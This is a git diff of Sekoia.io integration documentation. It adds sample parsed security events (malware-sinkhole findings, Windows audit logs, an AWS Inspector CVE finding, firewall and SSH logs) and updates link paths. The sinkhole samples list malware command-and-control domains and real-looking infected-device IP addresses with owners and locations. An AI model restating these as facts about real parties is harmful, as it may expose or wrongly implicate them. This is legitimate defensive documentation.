network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199948, + "desc": "Potentially vulnerable application infection detected on IP address 190.109.227.80 communicating with Command-and-Control domain open.kickasstracker.com" + } + } + ``` + + + +=== "test_security_finding_6" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Adware" + ], + "name": "adware.android.imp", + "provider": "SecurityScorecard", + "uid": "adware.android.imp_7cd5cf7b-4c99-406c-ad46-621487394fba" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"152\",\"enc_host\":\"x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com\",\"enc_raw_header\":\"UE9TVCAvYXVjdGlvbi9pbml0IEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtcHJvdG9idWYNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29udGVudC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgU00tQTIwN0YgQnVpbGQvUlAxQS4yMDA3MjAuMDEyKQ0KSG9zdDogeC1ldS41OGRhYzE2ZTdiMmM4NmMxOWNmZTQ4OTE0YTZlOGZjZGFjOWFlMDZmZTVjZjUzMzY5YmVhYTQ1Yi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzMDMNCg0K\",\"enc_request\":\"POST%20%2Fauction%2Finit%20HTTP%2F1.1\",\"enc_request_body\":\"H4sIAAAAAAAAAK3PzUoDMRQFYEhbSwNSnI1lljKrgYQkzd+47MqNIIg/u3qTTHCUzshMacFHEHwGwbUPaStVQTcu3F3uOXxwcI8X02TsmwWFdUehDm1ThQk6QpznvZs3JPCsCqfgb6u6PB5wWlA9y0oLzjGvCHPGE+kgEif05iq5YVZZkEye9M+Qy6LVLETpiXfOEilAE2sUJ9EIr4WCGKfibqSoVJQRrttMhKijLhjxQhsijSo29NSS4IOSDJRRzDy+IvyC8H5dLtdNe9/Nqzo2yTMSTwhf55c4wcNdlAzTwaKFKuAUj3e/+apsu6qptxnb7LE4w4efGQR4WJbtV2eUDj82U46v8gt88C3vpf0VdMt/gC/y8x9wvYUnv+FB2uOU/Y19BzRbkezaAQAA\",\"family\":\"adware.android.imp\",\"field_1\":\"2022-09-23T16:20:10.540428 version_5\",\"remote_addr\":\"38.7.186.198\",\"remote_port\":\"59750\",\"remote_user\":\"-\",\"status\":\"404\",\"time_local\":\"2022-09-23T16:19:38+00:00\"}", + "message": "Adware infection detected on IP address 38.7.186.198 by Malware DNS sinkhole on communication domain for sinkholed domain x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199948, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199948, + "original_time": "2022-11-15T17:59:59.948Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 38.7.186.198 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "emix.net.ae", + "uid": "38.7.186.198" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "38.7.186.198" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Adware" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "adware.android.imp" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "59750" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Karachi (Sector Five F), Pakistan" + } + ], + "finding": { + "title": "Infection found on 38.7.186.198", + "uid": "26c7c83d-0aad-411b-88ee-52343ff22064", + "types": [ + "malware_infection", + "infected_device", + "adware.android.imp" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/38.7.186.198", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199948, + "desc": "Adware infection detected on IP address 38.7.186.198 communicating with Command-and-Control domain x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com" + } + } + ``` + + + +=== "test_system_activity_1" + + + ```json + { + "activity_id": 99, + "actor": { + "process": { + "file": { + "name": "lsass.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\lsass.exe", + "type_id": 1 + }, + "pid": 492 + }, + "session": { + "uid": "0x3e7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "DIR", + "name": "STLDIRDC1$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "category_uid": 1, + "class_uid": 1010, + "device": { + "hostname": "STLDIRDC1.dir.solutia.com", + "os": { + "name": "Windows", + "type_id": 100 + }, + "type_id": 0 + }, + "message": "A handle to an object was requested.", + "metadata": { + "original_time": "01/09/2019 12:46:00 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "d9e6a7b1-3177-4542-8de1-bfd582f87727", + "version": "1.0.0-rc.2" + }, + "severity_id": 1, + "status_id": 1, + "time": 1547012760000, + "unmapped": { + "Access Request Information": { + "Access Mask": "0x2d", + "Accesses": [ + "DELETE", + "READ_CONTROL", + "WRITE_DAC", + "WRITE_OWNER", + "ReadPasswordParameters", + "WritePasswordParameters", + "ReadOtherParameters", + "WriteOtherParameters", + "CreateUser", + "CreateGlobalGroup", + "CreateLocalGroup", + "GetLocalGroupMembership", + "ListAccounts" + ], + "Privileges Used for Access Check": "\u01ff\\x0F-", + "Properties": [ + "---", + "domain", + "DELETE", + "READ_CONTROL", + "WRITE_DAC", + "WRITE_OWNER", + "ReadPasswordParameters", + "WritePasswordParameters", + "ReadOtherParameters", + "WriteOtherParameters", + "CreateUser", + "CreateGlobalGroup", + "CreateLocalGroup", + "GetLocalGroupMembership", + "ListAccounts", + "Domain Password & Lockout Policies", + "lockOutObservationWindow", + "lockoutDuration", + "lockoutThreshold", + "maxPwdAge", + "minPwdAge", + "minPwdLength", + "pwdHistoryLength", + "pwdProperties", + "Other Domain Parameters (for use by SAM)", + "serverState", + "serverRole", + "modifiedCount", + "uASCompat", + "forceLogoff", + "domainReplica", + "oEMInformation", + "Domain Administer Server" + ], + "Restricted SID Count": "0", + "Transaction ID": "{00000000-0000-0000-0000-000000000000}" + }, + "EventCode": "4661", + "EventType": "0", + "Object": { + "Object Server": "Security Account Manager" + }, + "OpCode": "Info", + "RecordNumber": "3166250565", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "SAM" + }, + "win_resource": { + "name": "DC=dir,DC=solutia,DC=com", + "type_id": 36, + "uid": "0x7f79620" + } + } + ``` + + + +=== "test_system_activity_2" + + + ```json + { + "activity_id": 1, + "actor": { + "process": { + "file": { + "name": "explorer.exe", + "parent_folder": "C:\\Windows", + "path": "C:\\Windows\\explorer.exe", + "type_id": 1 + }, + "pid": 1704 + }, + "session": { + "uid": "0xDE9AD8" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "SESTEST", + "name": "splunker", + "uid": "SESTEST\\splunker" + } + }, + "category_uid": 1, + "class_uid": 1010, + "device": { + "hostname": "SesWin2019DC1.SesTest.local", + "os": { + "name": "Windows", + "type_id": 100 + }, + "type_id": 0 + }, + "message": "A privileged service was called.", + "metadata": { + "original_time": "01/28/2022 04:12:19 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "995559a6-1921-463f-93e1-9c5ca932dc8c", + "version": "1.0.0-rc.2" + }, + "severity_id": 1, + "status_id": 2, + "time": 1643404339000, + "unmapped": { + "EventCode": "4673", + "EventType": "0", + "OpCode": "Info", + "RecordNumber": "374060", + "Service Request Information": { + "Privileges": "SeTcbPrivilege" + }, + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Sensitive Privilege Use" + }, + "win_resource": { + "name": "-", + "type": "Security", + "type_id": 0 + } + } + ``` + + + +=== "test_vulnerability_finding_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Update", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Vulnerability Finding", + "class_uid": 2002, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "finding_info": { + "created_time_dt": "2023-04-21T11:59:04.000-04:00", + "desc": "Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARM\nplatform contains a bug that could cause it to read past the input buffer,\nleading to a crash.\n\nImpact summary: Applications that use the AES-XTS algorithm on the 64 bit ARM\nplatform can crash in rare circumstances. The AES-XTS algorithm is usually\nused for disk encryption.\n\nThe AES-XTS cipher decryption implementation for 64 bit ARM platform will read\npast the end of the ciphertext buffer if the ciphertext size is 4 mod 5 in 16\nbyte blocks, e.g. 144 bytes or 1024 bytes. If the memory after the ciphertext\nbuffer is unmapped, this will trigger a crash which results in a denial of\nservice.\n\nIf an attacker can control the size and location of the ciphertext buffer\nbeing decrypted by an application using AES-XTS on 64 bit ARM, the\napplication is affected. This is fairly unlikely making this issue\na Low severity one.", + "first_seen_time_dt": "2023-04-21T11:59:04.000-04:00", + "last_seen_time_dt": "2024-01-26T17:19:14.000-05:00", + "modified_time_dt": "2024-01-26T17:19:14.000-05:00", + "title": "CVE-2023-1255 - openssl", + "types": [ + "Software and Configuration Checks/Vulnerabilities/CVE" + ], + "uid": "arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5" + }, + "metadata": { + "log_version": "2018-10-08", + "processed_time_dt": "2024-01-26T17:59:56.923-05:00", + "product": { + "feature": { + "uid": "AWSInspector" + }, + "name": "Inspector", + "uid": "arn:aws:securityhub:us-east-2::product/aws/inspector", + "vendor_name": "Amazon", + "version": "2" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "resource.uid", + "type": "Resource UID", + "type_id": 10, + "value": "arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8" + } + ], + "resource": { + "cloud_partition": "aws", + "data": "{\"AwsEcrContainerImage\":{\"Architecture\":\"amd64\",\"ImageDigest\":\"sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\",\"ImagePublishedAt\":\"2023-04-11T21:07:55Z\",\"RegistryId\":\"111111111111\",\"RepositoryName\":\"browserhostingstack-EXAMPLE-btb1o54yh1jr\"}}", + "region": "us-east-2", + "type": "AwsEcrContainerImage", + "uid": "arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8" + }, + "severity": "Medium", + "severity_id": 3, + "status": "New", + "time": 1706307554000, + "time_dt": "2024-01-26T17:19:14.000-05:00", + "type_name": "Vulnerability Finding: Update", + "type_uid": 200202, + "unmapped": { + "FindingProviderFields.Severity.Label": "MEDIUM", + "FindingProviderFields.Types[]": "Software and Configuration Checks/Vulnerabilities/CVE", + "ProductFields.aws/inspector/FindingStatus": "ACTIVE", + "ProductFields.aws/inspector/inspectorScore": "5.9", + "ProductFields.aws/inspector/packageVulnerabilityDetails/vulnerablePackages/sourceLayerHashes": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09", + "ProductFields.aws/inspector/resources/1/resourceDetails/awsEcrContainerImageDetails/platform": "ALPINE_LINUX_3_17", + "ProductFields.aws/securityhub/CompanyName": "Amazon", + "ProductFields.aws/securityhub/FindingId": "arn:aws:securityhub:us-east-2::product/aws/inspector/arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5", + "ProductFields.aws/securityhub/ProductName": "Inspector", + "RecordState": "ACTIVE", + "Severity.Normalized": "40", + "Vulnerabilities[].Cvss[].Source": "NVD,NVD", + "Vulnerabilities[].Vendor.VendorSeverity": "MEDIUM", + "Vulnerabilities[].VulnerablePackages[].SourceLayerHash": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09", + "WorkflowState": "NEW" + }, + "vulnerabilities": [ + { + "affected_packages": [ + { + "architecture": "X86_64", + "epoch": 0, + "fixed_in_version": "0:3.0.8-r4", + "name": "openssl", + "package_manager": "OS", + "release": "r3", + "remediation": { + "desc": "apk update && apk upgrade openssl" + }, + "version": "3.0.8" + } + ], + "cve": { + "created_time_dt": "2023-04-20T13:15:06.000-04:00", + "cvss": [ + { + "base_score": 5.9, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + { + "base_score": 5.9, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + } + ], + "epss": { + "score": "0.00066" + }, + "modified_time_dt": "2023-09-08T13:15:15.000-04:00", + "references": [ + "https://nvd.nist.gov/vuln/detail/CVE-2023-1255" + ], + "uid": "CVE-2023-1255" + }, + "is_exploit_available": true, + "is_fix_available": true, + "references": [ + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bc2f61ad70971869b242fc1cb445b98bad50074a", + "https://www.openssl.org/news/secadv/20230419.txt", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=02ac9c9420275868472f33b01def01218742b8bb" + ], + "remediation": { + "desc": "Remediation is available. Please refer to the Fixed version in the vulnerability details section above.For detailed remediation guidance for each of the affected packages, refer to the vulnerabilities section of the detailed finding JSON." + }, + "vendor_name": "NVD" + } + ] + } + ``` + + + +=== "test_windows_resource_activity_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Access", + "actor": { + "process": { + "file": { + "name": "services.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\services.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 532 + }, + "session": { + "uid": "0x3e7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "SOI", + "name": "SZUSOIDC1$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Windows Resource Activity", + "class_uid": 201003, + "device": { + "hostname": "szusoidc1.soi.dir.acme080.com", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "message": "An attempt was made to access an object.", + "metadata": { + "original_time": "01/14/2015 08:30:54 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "05e90f2c-5be6-484c-aefb-f8e6f591bd2c", + "version": "1.0.0-rc.2" + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1421285454000, + "type_name": "Windows Resource Activity: Access", + "type_uid": 101001, + "unmapped": { + "Access Mask": "0x2", + "Access Request Information": { + "Accesses": "Set key value" + }, + "CaseID": "AD_4663", + "EventCode": "4663", + "EventType": "0", + "Object": { + "Object Server": "Security" + }, + "OpCode": "Info", + "RecordNumber": "989202992", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Registry" + }, + "win_resource": { + "name": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\EventLog\\Security", + "type": "Key", + "type_id": 25, + "uid": "0x564" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md b/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md index 439a07cb8c..a551974302 100644 --- a/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md +++ b/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "combined.json" diff --git a/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md b/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md index 972e726a40..ee06a14fb6 100644 --- a/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md +++ b/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert.json" diff --git a/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md b/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md index 154d73ea08..be6f6bff0f 100644 --- a/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md +++ b/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_certificate_create.json" diff --git a/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md b/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md index 26e1019d09..874fafa104 100644 --- a/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md +++ b/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_ignoring_request.json" diff --git a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md index 05a6ded5e6..cc40eefe0d 100644 --- a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md +++ b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -23,10 +23,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_network_1_1.json" @@ -233,7 +232,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -253,3 +252,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.mac` | `keyword` | MAC address of the source. | |`source.port` | `long` | Port of the source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Juniper/juniper-switches). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md new file mode 100644 index 0000000000..9217e66a1a --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md @@ -0,0 +1,38 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_network_1_1" + + ``` + FW: et-1/1/1.2505 D 09c9:0800 4a:74:92:52:6c:20 -> bd:83:17:63:d5:f7 tcp 1.2.3.4 5.6.7.8 46736 3405 (1 packets) + ``` + + + +=== "test_network_1_2" + + ``` + FW: et-1/1/1.2505 D 09c9:0800 4a:74:92:52:6c:20 -> 71:89:a4:34:a0:b4 tcp 1.2.3.4 5.6.7.8 60000 29822 (1 packets) + ``` + + + +=== "test_network_2" + + ``` + FW: lsi.0 D 4a:74:92:52:6c:20 bd:83:17:63:d5:f7 8100:9 8847:5dc 13b UDP 1.2.3.4 5.6.7.8 52767 161 (1 packets) + ``` + + + +=== "test_network_3" + + ``` + FW: ge-0/0/0.0 A icmp 1.2.3.4 5.6.7.8 8 0 (1 packets) + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md b/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md index a25ad7f7fd..7335e69047 100644 --- a/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md +++ b/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ipfix.json" diff --git a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md index 5499c79997..4cca3b952f 100644 --- a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md +++ b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md @@ -17,15 +17,15 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `` | -| Category | `authentication`, `network`, `session` | -| Type | `end`, `protocol`, `start` | +| Category | `authentication`, `configuration`, `library`, `network`, `session` | +| Type | `end`, `info`, `protocol`, `start` | ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accepted_google_authenticator.json" @@ -337,6 +337,107 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "accepted_rsa.json" + + ```json + + { + "message": " Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "accepted_rsa_2.json" + + ```json + + { + "message": " Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "auth_method_disabled.json" + + ```json + + { + "message": "main: sshd: ssh-rsa algorithm is disabled", + "event": { + "category": [ + "configuration" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "outcome_reason": "main: sshd: ssh-rsa algorithm is disabled" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + === "authentication_attempts_exceeded.json" ```json @@ -592,6 +693,50 @@ This section demonstrates how the raw logs will be transformed by our 